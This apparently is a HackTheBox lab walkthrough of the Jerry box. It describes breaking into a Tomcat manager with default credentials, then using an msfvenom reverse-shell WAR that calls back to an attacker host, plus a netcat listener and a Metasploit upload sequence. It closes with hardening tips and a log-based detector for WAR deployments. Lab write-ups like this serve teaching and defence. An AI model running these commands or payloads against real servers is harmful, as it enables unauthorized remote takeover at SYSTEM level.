Jerry - HackTheBox Walkthrough

Box Info

  • Name: Jerry
  • OS: Windows
  • Difficulty: Easy
  • IP: 10.10.10.95
  • Release Date: June 2018

Summary

Jerry is an easy Windows box featuring an Apache Tomcat server with default credentials. By exploiting the manager interface with known credentials, we can upload a malicious WAR file to gain immediate SYSTEM-level access.

Reconnaissance

Nmap Scan

sudo nmap -sC -sV -oN Jerry.nmap 10.10.10.95

Results:

  • Port 8080 - Apache Tomcat 7.0.88

A full TCP scan confirms no additional ports are open:

nmap -p- --min-rate=1000 10.10.10.95

Service Analysis

  • Single attack surface: Tomcat web server
  • Version 7.0.88 allows authenticated code execution: anyone who can log in to the Manager application can deploy a WAR file
  • Manager interface accessible at /manager/html

Enumeration

Tomcat Manager Access

Navigate to:

http://10.10.10.95:8080/manager/html

The browser prompts for credentials. Testing default Tomcat credentials:

Username   Password   Result
tomcat     tomcat     Failed
admin      admin      Failed
tomcat     s3cret     Success

Default credentials work: tomcat:s3cret

Exploitation

Method 1: Manual WAR Upload

  1. Generate reverse shell payload:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f war -o shell.war

  2. Start listener:

nc -lvnp 4444

  3. Deploy WAR file:
    • Log in to Tomcat Manager with tomcat:s3cret
    • Scroll to the “WAR file to deploy” section
    • Click “Browse” and select shell.war
    • Click “Deploy”
  4. Trigger payload:

http://10.10.10.95:8080/shell/

Result: Reverse shell with NT Authority\SYSTEM privileges!

Method 2: Metasploit

msfconsole
use exploit/multi/http/tomcat_mgr_upload
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set RHOSTS 10.10.10.95
set HTTPUSERNAME tomcat
set HTTPPASSWORD s3cret
set RPORT 8080
exploit

Privilege Escalation

Not required!

The Tomcat service runs as NT Authority\SYSTEM, giving us the highest Windows privilege level immediately upon exploitation.

C:\apache-tomcat-7.0.88>whoami
nt authority\system

Flags

Both user and root flags are located in the same directory:

C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt
type "C:\Users\Administrator\Desktop\flags\2 for the price of 1.txt"

Key Takeaways

  1. Default Credentials - Always test common/default credentials on known services
  2. Service Identification - Tomcat version revealed attack vector
  3. WAR File Upload - Standard Tomcat exploitation technique
  4. Privilege Configuration - Services running as SYSTEM = instant win

Tools Used

  • nmap - Port scanning and service detection
  • msfvenom - Payload generation
  • netcat - Reverse shell listener
  • Metasploit (optional) - Automated exploitation

Prevention

  • Change default credentials immediately after installation
  • Restrict manager interface access (IP whitelist)
  • Run Tomcat with least-privilege service account
  • Keep Tomcat updated to latest version
  • Monitor for unauthorized WAR deployments
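
One way to monitor for unauthorized WAR deployments and check the manager IP restriction from the Tomcat access log. This is an added example, not part of the original walkthrough; it assumes the AccessLogValve "common" pattern, and the admin range and sample log lines are constructed placeholders.

```python
import ipaddress
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$')
# Manager endpoints that accept a WAR: HTML form upload and text-API deploy.
DEPLOY_PATHS = ("/manager/html/upload", "/manager/text/deploy")
# Assumption: placeholder range for admin hosts allowed to use the Manager.
ADMIN_NETS = [ipaddress.ip_network("192.0.2.0/28")]

def analyze(lines, admin_nets=ADMIN_NETS, fail_threshold=3):
    """Return (kind, host, detail) alerts for Manager activity in access-log lines."""
    alerts, failures = [], defaultdict(int)
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or not m["path"].startswith("/manager/"):
            continue
        host, user, status = m["host"], m["user"], int(m["status"])
        try:
            trusted = any(ipaddress.ip_address(host) in n for n in admin_nets)
        except ValueError:  # %h logged a hostname: treat as untrusted
            trusted = False
        if status == 401:
            # A browser's first, credential-less request also counts as a 401.
            failures[host] += 1
        elif status < 400 and user != "-":
            if failures[host] >= fail_threshold:
                alerts.append(("login-after-failures", host, user))
            failures[host] = 0
        path = m["path"].split("?", 1)[0]
        if m["method"] in ("POST", "PUT") and path in DEPLOY_PATHS and status < 400:
            kind = "war-deploy" if trusted else "war-deploy-untrusted-source"
            alerts.append((kind, host, f"{user} {m['ts']}"))
    return alerts

# Constructed sample lines (not captured from the box).
SAMPLE_LOG = [
    '10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '10.10.14.5 - - [01/Jan/2024:10:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '10.10.14.5 - - [01/Jan/2024:10:00:09 +0000] "GET /manager/html HTTP/1.1" 401 2473',
    '10.10.14.5 - tomcat [01/Jan/2024:10:00:14 +0000] "GET /manager/html HTTP/1.1" 200 17432',
    '10.10.14.5 - tomcat [01/Jan/2024:10:01:30 +0000] "POST /manager/html/upload?x=1 HTTP/1.1" 200 18011',
    '192.0.2.10 - ops [01/Jan/2024:11:00:00 +0000] "GET /manager/html HTTP/1.1" 200 17432',
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

A deployment from inside the admin range is still reported as war-deploy, so every WAR upload leaves a reviewable record.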

  • Difficulty: Easy
  • Time to root: ~15 minutes
  • Key vulnerability: Default credentials + authenticated WAR upload

This post is licensed under CC BY 4.0 by the author.